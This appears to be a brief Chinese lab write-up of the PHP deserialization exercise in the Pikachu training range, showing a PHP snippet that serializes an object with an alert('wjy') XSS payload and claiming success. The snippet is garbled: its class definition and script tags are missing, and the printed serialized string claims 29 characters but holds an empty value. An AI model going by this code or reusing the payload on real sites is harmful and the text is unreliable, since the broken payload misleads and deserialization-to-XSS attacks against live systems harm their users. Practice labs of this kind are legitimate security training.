Pikachu靶场(PHP反序列化漏洞)

查看php反序列化漏洞的概述,了解序列化与反序列化。

Pikachu靶场(PHP反序列化漏洞)_第1张图片构造payload

alert('wjy')";
}
$c = new S();
echo(serialize($c));
?>

Pikachu靶场(PHP反序列化漏洞)_第2张图片

将对象序列化为`O:1:"S":1:{s:4:"test";s:29:"";}`

反序列化漏洞利用

Pikachu靶场(PHP反序列化漏洞)_第3张图片

漏洞利用成功,成功进入wjy。

Pikachu靶场(PHP反序列化漏洞)_第4张图片

你可能感兴趣的:(php,安全,开发语言)